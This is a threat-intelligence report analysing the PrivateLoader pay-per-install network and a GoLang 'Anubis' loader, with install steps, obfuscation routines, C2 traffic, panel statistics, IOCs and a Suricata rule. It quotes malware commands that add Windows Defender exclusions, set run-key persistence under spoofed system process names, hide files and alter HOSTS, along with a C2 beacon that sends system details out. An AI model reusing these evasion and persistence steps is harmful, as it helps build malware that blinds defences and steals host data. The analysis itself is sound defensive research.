PrivateLoader to Anubis Loader
By: Jason Reaves and Joshua Platt
Intel471 released a report[1] on a loader system being leveraged for distribution of various crimeware malware families:
- Qbot
- SmokeLoader
- TrickBot
- NanoCore RAT
- Redline stealer
- njRat
- Djvu ransomware
- Vidar stealer
- Remcos RAT
- Tofsee spambot
- QRat
- Lockbit ransomware
- Dridex
- DanaBot
The diversity of the malware families led the Walmart Cyber Intel team to investigate further.
Infrastructure Analysis
The report mentioned an administrator panel located on the main command and control server. The panel is named “EZCubePanel” by the author. The configuration options are fairly straightforward as laid out in the intel471 offering. The panel is configured to deliver links and browser extensions.
The browser extensions did appear to be suspended at the time but were likely utilized in previous campaigns.
While the AdminLTE open source bootstrap template has been implemented to streamline the UI process, the main functionality is implemented in php.
Curiously, two geo tags appear to be linked to specific domains. The tag WW_5 is hard coded for ezsoftware[.]ru, while the tag WW_8 is linked to vip-space[.]com & vip-files[.]com
Installer
The private loader installer makes some interesting requests.
941c7e39e8ea114465eadbd45aa709d55ad36ba551cbbf552e4c09b494a3a32d
After downloading a proxy list and contacting statistics.php, the payload link is encrypted with a simple xor routine and delivered to the client.
>>> for i in range(len(b)):... b[i] ^= 0x1d...>>> bbytearray(b'URL:https://cdn.discordapp. com/attachments/910842184708792331/931520130133930034/PL_Client.mp')
Database
Infection counts show a large loader based system, which mimics some of the data presented in the report by Intel471.
Extension infection stats:
Logger infection stats from deliveries:
Loaders Loading Loaders
According to the report, “Privacy tools” domains were utilized as a primary delivery for SmokeLoader. After checking out a few of the domains, some interesting stats were discovered. In November of 2021, over a period of 20 days there were over 125K loads. For December 2021, roughly 82K for pab2 and pab3.
The stat panel below appeared to show loads for the affiliate IDs pub1, pub2 and pub3. Nearly 33K loads in nine days.
During our investigation we found other loaders delivered by PrivateLoader. Similar to what the report stated. However, during some of the loader executions, we observed traffic that did not appear to line up with the other stealers.
After further inspection of the ‘build_dl’ traffic, one of the uncovered loader samples was actually developed in GoLang.
Upon execution, the sample performs a check to see if it has admin privileges by attempting to open \\PHYSICALDRIVE:
Next it takes a screenshot:
And then proceeds to install itself:
Some of the strings are obfuscated but the deobfuscation is simply subtracting one from every character:
def deobf(a):
b = bytearray(a)
for i in range(len(b)):
b[i] -=1
return b
So now we can easily map out the install process steps, the malware leverages powershell to setup some exclusion paths:
powershell -Command Add-MpPreference -ExclusionPath
on:
AppData\Local\Temp
AppData\Local\Microsoft
Sets a runkey in Software\\Microsoft\\Windows\\CurrentVersion\\Run and the registry name and install name will be randomly generated from a hardcoded list of possibilities, install names:
svchost
csrss
rundll32
winlogon
smss
taskhost
unsecapp
AdobeARM
winsys
jusched
BCU
wscntfy
conhost
csrss
dwm
sidebar
ADService
AppServices
acrotray
ctfmon
lsass
realsched
spoolsv
RTHDCPL
RTDCPL
MSASCui
For the registry names:
Trion Softworks
Mystic Entertainment
Microsoft Partners
Client-Server Runtime Subsystem
Networking Service
After then moving itself to the proper location it will use ‘attrib’ to set itself as a system file and hidden:
attrib +S +H
Along with altering the HOSTS file: (edited for brevity)
And flushing the DNS cache:
ipconfig //flushdns
After installation the bot will connect to the C2 either over HTTP or TCP and register itself by sending various information back to the C2 via TCP:
md5(cmd /c whoami) +
“->Reg->[“ +
Datetime +
”]->” +
<cmd /c whoami> +
“->” +
<wmic cpu get name> +
“->” +
<wmic path win32_VideoController get name> +
“->” +
<cmd /C ver> +
“->” +
Bot Build +
<isAdmin()>
For HTTP traffic an example can be seen below, the data sent to the server is obfuscated by adding two to every byte:
POST /callback HTTP/1.1
Host: redacted.x.x.x
User-Agent: Go-http-client/1.1
Content-Length: 57
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzipcallback=HktgYcnn%22Cffgf%22%2F%22lwuejgf®info=WugtMKV
After registration, the bot will check for tasks to perform:
Panel
The panel refers to itself as ‘ANUBIS PANEL’ and contains roughly 20K bots. The bots appeared to be leveraged for crypto mining and distributing other malware.
PPI stats
By country:
Country map for installs:
Install stat slice from January:
The stats clearly show Anubis operators have been delivering thousands of installs each week. In the case of Anubis, more than 500 unique binaries were distributed. The delivered tasks from Anubis also appear to similarly overlap with those of PrivateLoader.
Over a period of 12 days, more than 11 GB of stealer logs were collected. While cracked software is often overlooked in the world of CyberCrime, it is clearly underestimated as a tactic.
IOCs
Privacy-tools-for-you-777[.]com
2.56.59[.]42
212.193.30[.]29
212.193.30[.]45
privacy-tools-for-you-782[.]com
file-coin-host-12[.]com
host-file-file0[.]com
privacy-tools-for-you-781[.]com
coin-file-file-19[.]com
coin-coin-file-9[.]com
file-file-host8[.]com
data-host-coin-8[.]com
file-file-host4[.]com
host-data-coin-11[.]comAnubis Loader:
84b33d3b0c1e396758f9591e797f5b0029be3f6a752dc2bec2dc20a85d68adda
b7e657155c23d71f732171d68764793bb6010d42da1f80eb4dc9a630aeae1307
4b5b660add37cd7a6d6a2444c3d410ed0de1c24e59c5e1d0091976bbc8099fef
TCP traffic suricata rule:
alert tcp $HOME_NET any -> $EXTERNAL_NET any ( msg:"Anubis Registration"; content:"|54 67 69 2f 40|"; within:50; content:"|4f6b6574717571687622596b7066717975225d586774756b7170|"; classtype:trojan-activity; sid:9000001; rev:1;)